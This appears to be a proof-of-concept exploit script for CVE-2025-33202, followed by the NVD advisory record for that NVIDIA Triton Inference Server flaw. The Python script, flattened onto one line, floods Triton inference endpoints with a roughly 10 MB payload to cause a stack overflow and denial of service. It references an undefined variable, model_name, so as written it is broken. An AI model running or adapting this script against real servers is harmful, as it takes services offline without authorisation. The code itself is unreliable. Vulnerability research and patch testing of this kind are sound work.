CVE-2025-33202

# CVE-2025-33202 PoC - NVIDIA Triton Inference Server Stack Overflow # This PoC demonstrates sending oversized payloads to trigger stack overflow # Target: NVIDIA Triton Inference Server # Impact: Denial of Service import requests import sys import argparse def exploit_triton_stack_overflow(target_url, payload_size=10000000): """ Send oversized payload to Triton Inference Server to trigger stack overflow vulnerability (CVE-2025-33202) Args: target_url: Base URL of Triton Inference Server payload_size: Size of oversized payload in bytes """ # Generate oversized payload oversized_payload = b'A' * payload_size # Triton Inference Server typically uses gRPC (port 8001) or HTTP (port 8000) endpoints = [ f"{target_url}/v2/models/{model_name}/infer", f"{target_url}/api/inference" ] for endpoint in endpoints: try: print(f"[*] Sending oversized payload ({payload_size} bytes) to {endpoint}") # HTTP POST request with oversized body headers = { 'Content-Type': 'application/json', 'User-Agent': 'Triton-Overflow-Test/1.0' } # Construct inference request with oversized payload payload = { 'inputs': [ { 'name': 'input_data', 'shape': [payload_size], 'datatype': 'BYTES', 'data': [oversized_payload.decode('latin-1')] } ] } response = requests.post(endpoint, json=payload, headers=headers, timeout=30) print(f"[+] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") print("[*] PoC execution completed. Check server status for DoS effect.") if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-33202 PoC') parser.add_argument('--target', default='http://localhost:8000', help='Target URL') parser.add_argument('--size', type=int, default=10000000, help='Payload size in bytes') args = parser.parse_args() exploit_triton_stack_overflow(args.target, args.size)

{"cve": {"id": "CVE-2025-33202", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:50.860", "lastModified": "2025-12-08T18:01:26.730", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Triton Inference Server for Linux and Windows contains a vulnerability where an attacker could cause a stack overflow by sending extra-large payloads. A successful exploit of this vulnerability might lead to denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:triton_inference_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.09", "matchCriteriaId": "C181B0DF-8011-46CA-95DE-556D673882C4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33202", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5723", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-33202", "source": "[email protected]", "tags": ["Technical Description"]}]}}